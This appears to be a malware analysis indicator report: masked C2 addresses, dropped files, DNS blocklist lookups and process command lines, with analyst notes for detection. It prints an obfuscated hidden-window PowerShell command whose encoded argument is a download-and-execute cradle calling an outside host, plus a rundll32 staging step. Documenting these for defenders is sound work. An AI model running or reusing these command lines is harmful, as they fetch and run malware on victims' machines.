Техническая информация
- http://46.#.19.179/bangladesh.php
- <SYSTEM32>\wermgr.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\olxya.bin
- '46.#.19.179':80
- '10#.#75.94.164':80
- '18#.#4.99.214':443
- 'id##t.me':443
- '18#.#4.99.214':443
- 'id##t.me':443
- DNS ASK id##t.me
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK 19#.###.###.95.b.barracudacentral.org
- Note: zen.spamhaus.org, cbl.abuseat.org and b.barracudacentral.org are DNS-based blocklist (DNSBL) zones, and the query name is an IP address in reversed-octet form. This pattern is a DNSBL lookup: the sample is most likely checking whether the infected host's own public IP is listed on spam blocklists (behaviour seen in spam-sending modules), so the reversed 19#.###.###.95 address is the victim's external IP, not a C2 indicator. Outbound queries to these zones from workstations are a useful detection signal in their own right.
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...
- Note: the switches are -NoProfile, -WindowStyle Hidden and -ExecutionPolicy Bypass; the mixed-case "poWERshEll" spelling is a trivial evasion of case-sensitive string matching. The -enc argument is base64 of a UTF-16LE string; the visible prefix decodes to `IEX (New-Object Net.Webclient).downloadstring("http://46` — a download-and-execute cradle. The URL is truncated in the source, but the "http://46" prefix is consistent with the http://46.#.19.179/bangladesh.php URL listed above; confirm from the full command line.
- '<SYSTEM32>\rundll32.exe' %TEMP%\OlxYA.bin StartW
- '<SYSTEM32>\wermgr.exe'
- Note: %TEMP%\OlxYA.bin is the same file as %TEMP%\olxya.bin listed above (NTFS paths are case-insensitive). A DLL dropped with a .bin extension and loaded via rundll32 with an exported entry point (StartW) is a well-known staging pattern; StartW is an export name commonly associated with Cobalt Strike beacon DLLs, but the family should be confirmed from the file itself. wermgr.exe (Windows Error Reporting Manager) is started with no arguments after the rundll32 stage — this is a frequently used process-injection host, so the process memory of wermgr.exe should be inspected rather than trusting the on-disk image.